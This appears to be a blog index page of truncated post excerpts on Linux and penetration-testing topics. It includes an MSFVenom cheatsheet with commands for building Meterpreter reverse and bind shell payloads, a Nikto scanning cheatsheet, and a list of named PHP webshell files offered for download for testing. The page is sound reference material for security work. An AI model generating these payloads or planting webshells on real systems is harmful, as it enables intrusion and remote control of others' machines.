Download Lubuntu to fit on a CD

MD5SUMS 25-Jul-2014 05:48 1.1K MD5SUMS-metalink 25-Jul-2014 05:48 1.2K MD5SUMS-metalink.gpg 25-Jul-2014 05:48 198 MD5SUMS.gpg 25-Jul-2014 05:48 198 SHA1SUMS 25-Jul-2014 05:48 1.2K SHA1SUMS.gpg 25-Jul-2014 05:48 198 SHA256SUMS 25-Jul-2014 05:48 1.6K SHA256SUMS.gpg 25-Jul-2014 05:48 198 lubuntu-14.04-alternate-amd64+mac.iso 17-Apr-2014 01:25 631M Alternate install image for 64-bit Mac (AMD64) computers (standard download) lubuntu-14.04-alternate-amd64+mac.iso.torrent 17-Apr-2014 20:53 25K Alternate install image for 64-bit […]

MSFVenom Cheatsheet

List payloadsmsfvenom -l Binaries Payloads Linux Meterpreter Reverse Shellmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf Linux Bind Meterpreter Shellmsfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf Linux Bind Shellmsfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf Windows Meterpreter Reverse TCP Shellmsfvenom -p […]

Nikto Cheatsheet / how to install nikto

Nikto Cheatsheet Nikto is a powerful assessment tools for finding vulnerabilities in web servers. Scanning a hostNikto -h <Hostname/IP> Scanning specific portsNikto -h <Hostname/IP> -port <Port Number>,<Port Number> Maximum scan timeNikto -h <Hostname/IP> -maxtime <Number in Seconds> Scanning durationNikto -h <Hostname/IP> -until Disable SSLNikto -h <Hostname/IP> -nossl Force SSLNikto -h <Hostname/IP> -ssl Disable 404 guessingNikto -h […]

Package tracker

Package Name Version in Kali Rolling Version in Debian Testing beads 1.1.18+dfsg-4 1.1.20-2 boxer-data 10.8.13 10.8.14 buildbot 2.7.0-1 2.8.2-2 cabal-debian 5.0-1 5.0.3-1 catch2 2.12.1-1 2.12.3-1 cds-healpix-java 0.26.1+ds-1 0.27.1+ds-1 cinnamon 4.4.8-4 4.6.6-1 cinnamon-control-center 4.4.0-2 4.6.1-1 cinnamon-desktop 4.4.1-3 4.6.2-1 cinnamon-desktop-environment 4.5+really4.4.1 4.6.1

php-webshells

SOURCED FROM https://n0where.net/php-webshells Do not host the file(s) on your LIVE server! – ONLY USE THESE FOR TESTING IN YOUR SAFE ENVIRONMENT 529.php AK-74 Security Team Web Shell Beta Version.php Ajax_PHP Command Shell.php Ajax_PHP_Command_Shell.php Antichat Shell v1.3.php Antichat Shell. Modified by Go0o$E.php Antichat Shell.php Antichat_Shell_v1.3.php Ayyildiz Tim -AYT- Shell v 2.1 Biz.php C99madShell v. 2.0 madnet […]

PYAUTOGUI output

Reading package lists… DoneBuilding dependency treeReading state information… DoneThe following additional packages will be installed:giblib1 libid3tag0 libimlib2The following NEW packages will be installed:giblib1 libid3tag0 libimlib2 scrot0 upgraded, 4 newly installed, 0 to remove and 0 not upgraded.Need to get 295 kB of archives.After this operation, 997 kB of additional disk space will be used.Do you […]

MinIO File Browser

MinIO Browser provides minimal set of UI to manage buckets and objects on minio server. MinIO Browser is written in javascript and released under Apache 2.0 License. https://github.com/minio/minio/tree/master/browser Installation Install node curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash exec -l $SHELL nvm install stable Install go-bindata and go-bindata-assetfs If you do not have a working Golang environment, […]